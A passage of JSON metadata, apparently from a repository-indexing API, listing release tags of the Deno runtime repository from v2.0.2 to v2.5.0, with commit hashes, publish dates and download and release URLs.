05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/